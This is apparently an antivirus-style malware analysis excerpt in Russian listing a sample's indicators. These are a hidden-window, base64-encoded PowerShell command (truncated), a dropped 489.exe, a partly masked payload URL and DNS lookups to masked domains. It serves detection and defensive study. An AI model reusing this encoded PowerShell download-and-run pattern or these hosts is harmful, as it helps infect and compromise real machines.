Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAUABpAGsAcQBoAHAAawBzAGIAaABhACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEwAbABlAGwAaAB3AHIAdwBiAHIAYgAgACMAPgAgACQAVgBhAHEAZgBqAHoAawBkAHoAeABrAHcAZg...
- %HOMEPATH%\489.exe
- %HOMEPATH%\489.exe
- http://www.co###ket.info/softaculous/YVciwzq/
- DNS ASK an##l.ac.nz
- DNS ASK co###ket.info
- DNS ASK al######.000webhostapp.com
- DNS ASK ho####cietepromo.ca
- DNS ASK au####orsale.co.nz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAUABpAGsAcQBoAHAAawBzAGIAaABhACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEwAbABlAGwAaAB3AHIAdwBiAHIAYgAgACMAPgAgACQAVgBhAHEAZgBqAHoAawBkAHoAeABrAHcAZg...' (со скрытым окном)